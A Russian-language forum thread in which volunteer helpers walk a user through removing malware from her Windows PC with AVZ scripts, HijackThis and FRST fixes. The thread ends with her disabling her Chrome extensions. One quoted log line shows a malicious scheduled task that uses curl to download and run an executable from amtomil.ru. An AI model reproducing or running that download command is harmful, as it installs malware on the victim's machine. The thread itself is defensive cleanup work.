[akok]

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

Код:

 begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Users\Алина Ткаченко\appdata\roaming\curl\curl.exe','');
 QuarantineFile('C:\Users\Алина Ткаченко\appdata\roaming\curl\curl_7_54.exe','');
 QuarantineFile('C:\Users\Алина Ткаченко\AppData\Roaming\Microsoft\msi.exe','');
 QuarantineFile('C:\WINDOWS\system32\drivers\mevrgooh.sys','');
 DeleteFile('C:\WINDOWS\system32\Tasks\curl','64');
 DeleteFile('C:\Users\Алина Ткаченко\AppData\Roaming\curl\curl_7_54.exe','32');
 DeleteFile('C:\WINDOWS\system32\Tasks\curls','64');
 DeleteFile('C:\WINDOWS\system32\Tasks\MSI','64');
 DeleteFile('C:\Users\Алина Ткаченко\AppData\Roaming\Microsoft\msi.exe','32');
 DeleteFile('C:\WINDOWS\system32\drivers\mevrgooh.sys','32');
 DeleteFile('C:\Users\Алина Ткаченко\appdata\roaming\curl\curl_7_54.exe','32');
 DeleteFile('C:\Users\Алина Ткаченко\appdata\roaming\curl\curl.exe','32');
 DeleteService('mevrgooh');
   BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
 BC_ImportALL;
RebootWindows(true);
end.

Компьютер перезагрузится. После перезагрузки, выполните такой скрипт:

Код:

begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.

Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

Код:

R0 - HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = https://newtab.club
O21 - ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task (Ready): MSI - C:\Users\Алина Ткаченко\AppData\Roaming\Microsoft\msi.exe cnt=2 fts="Desktop\tn_tfile_me_torrent___.exe" (file missing)
O22 - Task (Ready): curl - C:\Users\Алина Ткаченко\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Алина Ткаченко\AppData\Roaming\curl\curl.exe"
O22 - Task (Ready): curls - C:\Users\Алина Ткаченко\AppData\Roaming\curl\curl.exe
O22 - Task (Ready): lidnkghmpmbmkjalooojbaefceoolghb - C:\Users\Алина Ткаченко\AppData\Roaming\lidnkghmpmbmkjalooojbaefceoolghb\python\pythonw.exe "C:\Users\Алина Ткаченко\AppData\Roaming\lidnkghmpmbmkjalooojbaefceoolghb\ml.py" --APPNAME="lidnkghmpmbmkjalooojbaefceoolghb" (file missing)

- Перетащите лог Check_Browsers_LNK.log на утилиту ClearLNK. Отчёт о работе прикрепите.

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.

[epiepi]

Доброго дня!
Спасибо за помощь.
Отчеты о проделанной работе во вложении

[epiepi]

Shortcut.txt превышает размер. Загрузить не удалось

[Sandor]

Упакуйте архиватором.

[epiepi]

во вложении

апд. при переходе по ссылкам продолжаем грузится окно с рекламой

[Sandor]

• Отключите до перезагрузки антивирус.
• Выделите следующий код:
  
  Код:

  Start::
  CreateRestorePoint:
  GroupPolicy: Restriction - Chrome <==== ATTENTION
  Task: {59FB298D-B52F-48A8-A530-F97CBD25543E} - System32\Tasks\ComDev => C:\Users\Алина Ткаченко\AppData\Local\ComDev\ComDev.exe <==== ATTENTION
  Task: {CE1D72C9-977C-4B85-A1C1-A5E69840AFBB} - \curl -> No File <==== ATTENTION
  EmptyTemp:
  Reboot:
  End::

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

Цитата epiepi:

при переходе по ссылкам »

В каком браузере?

[epiepi]

Fixlog.txt во вложении
браузер Google Chrome

[Sandor]

Если проблема сохраняется:
Отключите в Хроме все расширения, в т.ч. стандартные. Пропадет - включайте по одному, пока не найдете виновника. Название сообщите.

[epiepi]

Отключение расширений помогло. Но к сожалению выяснить кто виновник не удалось. Очень много плагинов. Удалила все. Полет нормальный.
Спасибо всем за оперативную помощь!